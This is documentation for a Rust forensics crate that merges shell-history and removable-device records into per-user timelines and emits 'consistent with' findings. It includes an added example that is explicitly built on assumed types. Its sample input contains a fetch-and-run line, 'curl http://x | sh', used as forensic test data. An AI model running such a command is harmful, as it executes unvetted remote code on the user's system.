
Crate useract_forensic


useract-forensic — the user-activity correlation layer.

A thin meta / orchestration crate: it does not parse any raw format itself. It consumes already-decoded forensic reader types — today shellhist_core::HistoryEntry and peripheral_core::DeviceConnection — normalizes them into one uniform UserActivity event, builds a per-user timeline, and emits cross-source forensicnomicon::report::Findings that no single source could produce alone.

Every finding is an observation (“consistent with …”); the examiner draws the conclusions. MITRE techniques are narrated as consistency, never a verdict.

30-second example

use useract_forensic::{build_timeline, audit, ShellHistorySource, DeviceSource};
use shellhist_core::{HistoryEntry, Shell};

// (sources are normally produced by the reader crates; constructed here inline)
let entries = shellhist_core::parse_auto(b"#1700000000\ncurl http://x | sh\n", Some(".bash_history"));
let shell = ShellHistorySource::new(&entries);
let devices = DeviceSource::new(&[]);

let timeline = build_timeline(&[&shell, &devices]);
let findings = audit(&timeline);
for f in &findings {
    println!("{} — {}", f.code, f.note);
}
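The pipeline the description outlines, as an added self-contained example that is not the crate's own code: normalizers turn constructed stand-ins for decoded rows into UserActivity events, build_timeline merges and sorts them, and audit runs the exec-during-removable-media join bounded by REMOVABLE_MEDIA_WINDOW_SECS. The names mirror the crate's item list, but every type shape, the blanket impl of ActivitySource on Vec, the finding code UA-EXEC-NEAR-REMOVABLE, the 600-second value and the sample rows are assumptions, not the crate's API.

```rust
// Added example, not useract_forensic's own code: a self-contained miniature of
// the pipeline the crate description outlines, built around the
// exec-during-removable-media join. Names mirror the crate's item list, but
// every type shape, finding code and value here is assumed.

/// What a user did (assumed subset of the crate's Action enum).
#[derive(Debug, Clone, PartialEq)]
enum Action { Executed, Connected }

/// The thing acted on (assumed subset of the crate's Subject enum).
#[derive(Debug, Clone, PartialEq)]
enum Subject { Command(String), Device { serial: String, removable: bool } }

/// One normalized event: who did what, when, to which subject.
#[derive(Debug, Clone, PartialEq)]
struct UserActivity { ts: i64, user: String, action: Action, subject: Subject }

/// A producer of already-normalized events (assumed shape of ActivitySource).
/// The from_* normalizers below return plain Vecs, which implement it directly.
trait ActivitySource { fn activities(&self) -> Vec<UserActivity>; }
impl ActivitySource for Vec<UserActivity> { fn activities(&self) -> Vec<UserActivity> { self.clone() } }

fn event(ts: i64, user: &str, action: Action, subject: Subject) -> UserActivity {
    UserActivity { ts, user: user.to_string(), action, subject }
}
/// Normalize constructed stand-ins for decoded history rows: (ts, user, command line).
fn from_shell_history(rows: &[(i64, &str, &str)]) -> Vec<UserActivity> {
    rows.iter().map(|&(ts, u, cmd)| event(ts, u, Action::Executed, Subject::Command(cmd.into()))).collect()
}
/// Normalize constructed stand-ins for decoded device rows: (ts, user, volume serial, removable?).
fn from_device_connections(rows: &[(i64, &str, &str, bool)]) -> Vec<UserActivity> {
    rows.iter().map(|&(ts, u, s, removable)| event(ts, u, Action::Connected,
        Subject::Device { serial: s.into(), removable })).collect()
}

/// Default window for the exec-during-removable-media join (value assumed).
const REMOVABLE_MEDIA_WINDOW_SECS: i64 = 600;

/// A cross-source observation; the note reads "consistent with", never a verdict.
#[derive(Debug, Clone, PartialEq)]
struct Finding { code: &'static str, user: String, note: String }

/// Merge any number of sources into one timeline sorted by timestamp
/// (sort_by_key is stable, so equal timestamps keep source order).
fn build_timeline(sources: &[&dyn ActivitySource]) -> Vec<UserActivity> {
    let mut tl: Vec<UserActivity> = sources.iter().flat_map(|s| s.activities()).collect();
    tl.sort_by_key(|a| a.ts);
    tl
}

/// Temporal join: every command a user ran within `window` seconds after one of
/// their own removable devices connected. Commands before the connect, outside
/// the window, by another user, or after a non-removable connect do not match.
fn exec_during_removable_media(tl: &[UserActivity], window: i64) -> Vec<Finding> {
    let mut out = Vec::new();
    for d in tl.iter().filter(|d| d.action == Action::Connected) {
        let serial = match &d.subject {
            Subject::Device { serial, removable: true } => serial,
            _ => continue,
        };
        for a in tl.iter().filter(|a| a.user == d.user && a.ts >= d.ts && a.ts - d.ts <= window) {
            if let Subject::Command(cmd) = &a.subject {
                let note = format!("'{}' ran {}s after removable device {} connected; \
                    consistent with execution from removable media", cmd, a.ts - d.ts, serial);
                out.push(Finding { code: "UA-EXEC-NEAR-REMOVABLE", user: a.user.clone(), note });
            }
        }
    }
    out
}

/// Audit a merged timeline for cross-source findings (this miniature has one rule).
fn audit(tl: &[UserActivity]) -> Vec<Finding> {
    exec_during_removable_media(tl, REMOVABLE_MEDIA_WINDOW_SECS)
}

/// Constructed sample: two device connects and four commands across two users.
fn sample_timeline() -> Vec<UserActivity> {
    let shell = from_shell_history(&[
        (1_699_999_990, "alice", "cd /media"),              // 10 s before the connect: not counted
        (1_700_000_120, "alice", "sh /media/usb/setup.sh"), // 120 s after the connect: matches
        (1_700_000_100, "bob", "whoami"),                   // other user: ignored
        (1_700_009_000, "alice", "ls"),                     // 9000 s later: outside the window
    ]);
    let devices = from_device_connections(&[
        (1_700_000_000, "alice", "SER-ABC123", true),  // removable: the join anchor
        (1_700_000_050, "bob", "SER-FIXED01", false),  // fixed disk: never an anchor
    ]);
    let sources: [&dyn ActivitySource; 2] = [&shell, &devices];
    build_timeline(&sources)
}

fn main() { for f in audit(&sample_timeline()) { println!("{} [{}] {}", f.code, f.user, f.note); } }
```

The join is deliberately one-sided: a command is attached only to a connect by the same user that precedes it by at most the window, so a command typed just before the device appears is never attributed to it, and a fixed disk never anchors a finding. On the constructed rows this yields a single observation for alice; passing 60 or 9000 to exec_during_removable_media instead of the constant shows how directly the window governs the finding set.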

v0.2 roadmap

New per-user sources slot in behind the ActivitySource trait without an API break: lnk-core (recent-file LNK, completing the volume-serial join), shellbag-core (folder access), srum-core (per-user app execution and network bytes by SID — the strongest source), and winreg-artifacts (UserAssist / RecentDocs / MRU / MountPoints2). See docs/roadmap.md.

Structs

DeviceSource
A DeviceSource wraps a borrowed slice of decoded device connections.
ShellHistorySource
A ShellHistorySource wraps a borrowed slice of decoded history entries.
UserActivity
One normalized user-activity event: who did what, when, to which subject.

Enums

Action
What a user did to a Subject.
SourceKind
Which reader the activity was normalized from.
Subject
The thing an Action was performed on.

Constants

REMOVABLE_MEDIA_WINDOW_SECS
The default temporal window (seconds) for the exec-during-removable-media join.

Traits

ActivitySource
A producer of UserActivity events.

Functions

audit
Audit a merged timeline for cross-source user-activity findings.
audit_with
Like audit, but with a caller-supplied Source stamp (scope/version).
build_timeline
Merge any number of ActivitySources into one timeline, sorted by timestamp.
device_file_volume_joins
Generic volume-serial join: pair every Subject::Device activity with every Subject::File / Subject::Folder activity that names the same volume serial.
from_device_connections
Normalize a decoded device-connection stream into UserActivity events.
from_shell_history
Normalize a decoded shell-history stream into UserActivity events.
source
The Source stamp for findings this analyzer emits.